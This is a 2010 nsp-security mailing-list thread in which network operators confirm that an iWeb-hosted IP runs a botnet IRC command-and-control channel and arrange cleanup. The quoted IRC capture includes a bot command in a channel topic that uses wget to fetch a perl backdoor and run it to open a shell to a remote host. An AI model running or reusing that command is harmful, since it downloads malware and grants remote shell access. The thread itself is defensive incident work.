[nsp-sec] 72.55.133.149

Chris Calvert Chris.Calvert at telus.com
Wed May 5 12:00:31 EDT 2010 

Thanks Steve, clearly badness cohabiting with legitimate content.

Our abuse folks are in contact with iWeb to get them to clean up the host, source of our information and details relating to it left out of course. We're only telling them there is something bad relating to botnets and an IRC C&C on the IP and leaving it to them to figure out the rest as a result of their investigation.

Chris

> -----Original Message-----
> From: Stephen Gill [mailto:gillsr at cymru.com]
> Sent: May-05-10 9:42 AM
> To: Chris Calvert; NSP-SEC
> Subject: Re: [nsp-sec] 72.55.133.149
> 
> Looks naughty:
> 
> :Pucioasa.RO.EU.Undernet.Org 001 foo :Welcome to the Internet Relay
> Network
> foo
> :Pucioasa.RO.EU.Undernet.Org 002 foo :Your host is
> Pucioasa.RO.EU.Undernet.Org, running version beware1.5.7
> :Pucioasa.RO.EU.Undernet.Org 003 foo :This server was created Tue Jul
> 13
> 2004 at 20:36:17 GMT
> :Pucioasa.RO.EU.Undernet.Org 004 foo Pucioasa.RO.EU.Undernet.Org
> beware1.5.7
> dgikoswx biklmnoprstv
> :Pucioasa.RO.EU.Undernet.Org 005 foo MAP SILENCE=15 WHOX WALLCHOPS
> WALLVOICES USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=45
> :are
> supported by this server
> :Pucioasa.RO.EU.Undernet.Org 005 foo NICKLEN=12 TOPICLEN=160
> AWAYLEN=160
> KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,rimnpst
> CASEMAPPING=rfc1459 :are supported by this server
> :Pucioasa.RO.EU.Undernet.Org 251 foo :There are 2 users and 52
> invisible on
> 1 servers
> :Pucioasa.RO.EU.Undernet.Org 252 foo 1 :operator(s) online
> :Pucioasa.RO.EU.Undernet.Org 254 foo 2 :channels formed
> :Pucioasa.RO.EU.Undernet.Org 255 foo :I have 54 clients and 0 servers
> :Pucioasa.RO.EU.Undernet.Org NOTICE foo :Highest connection count: 64
> (64
> clients)
> :Pucioasa.RO.EU.Undernet.Org 422 foo :MOTD File is missing
> :Pucioasa.RO.EU.Undernet.Org NOTICE foo :on 1 ca 1(4) ft 10(10)
> LIST
> :Pucioasa.RO.EU.Undernet.Org 321 foo Channel :Users  Name
> :Pucioasa.RO.EU.Undernet.Org 322 foo #drone 5 :
> :Pucioasa.RO.EU.Undernet.Org 322 foo #flood 48 :cd /tmp;wget
> arkstock.com/help/inc/dc.txt;perl dc.txt 76.74.156.155 23
> :Pucioasa.RO.EU.Undernet.Org 323 foo :End of /LIST
> 
> 
> Dc.txt is a backdoor, instructed to connect to 76.74.156.155 23 and
> spawn a
> shell.
> 
> -- steve
> 
> 
> On 5/5/10 8:27 AM, "Chris Calvert" <Chris.Calvert at telus.com> wrote:
> 
> > ----------- nsp-security Confidential --------
> >
> > Can anyone (incl Team Cymru) comment on what they are seeing
> regarding these
> > entries in the rsv2 and dnsrr lists?
> >
> > 32613 | IWEB-AS - iWeb Technologies Inc. | 72.55.133.149   | tcp  |
> 6667  |
> > 2010-04-27 22:51:50 | 2010-05-05 22:51:50 | bot | 0 | 1 | ID:
> > Pucioasa.RO.EU.Undernet.ORG
> >
> > fedora.unixcod.com                       BOTNET  A      72.55.133.149
> > 32613  2010-04-26 02:31:49  STALE   TCP 6667
> >
> > The host is a webhosting platform, and there is legitimate content
> hosted at
> > the IP. I want to make sure it is a definite source of badness.
> >
> > Thanks,
> >
> > Chris
> > TELUS - AS852
> >
> >
> >
> >
> > _______________________________________________
> > nsp-security mailing list
> > nsp-security at puck.nether.net
> > https://puck.nether.net/mailman/listinfo/nsp-security
> >
> > Please do not Forward, CC, or BCC this E-mail outside of the nsp-
> security
> > community. Confidentiality is essential for effective Internet
> security
> > counter-measures.
> > _______________________________________________
> 
> --
> Stephen Gill, Chief Scientist, Team Cymru
> http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com
>

More information about the nsp-security mailing list